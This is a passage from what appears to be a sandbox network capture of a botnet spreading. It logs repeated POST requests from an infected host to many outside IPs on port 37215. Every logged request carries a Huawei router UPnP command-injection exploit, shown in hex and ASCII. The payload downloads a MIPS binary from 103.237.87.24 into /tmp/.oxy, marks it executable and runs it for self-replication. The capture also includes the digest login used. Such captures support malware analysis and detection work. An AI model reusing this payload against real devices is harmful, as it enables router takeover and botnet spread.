2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  418192.168.2.133684241.216.211.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111336946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  419192.168.2.1346706157.235.110.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111396074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  420192.168.2.1349980154.148.126.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111413956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  421192.168.2.1360770223.18.109.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111430883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  422192.168.2.1357640157.169.5.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111437082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  423192.168.2.135749441.100.179.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111450911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  424192.168.2.1348252157.1.108.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111460924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  425192.168.2.1338024157.237.162.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111479998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  426192.168.2.1350924157.11.14.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111485958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  427192.168.2.135674669.12.177.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111496925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  428192.168.2.1333874197.115.65.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111870050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
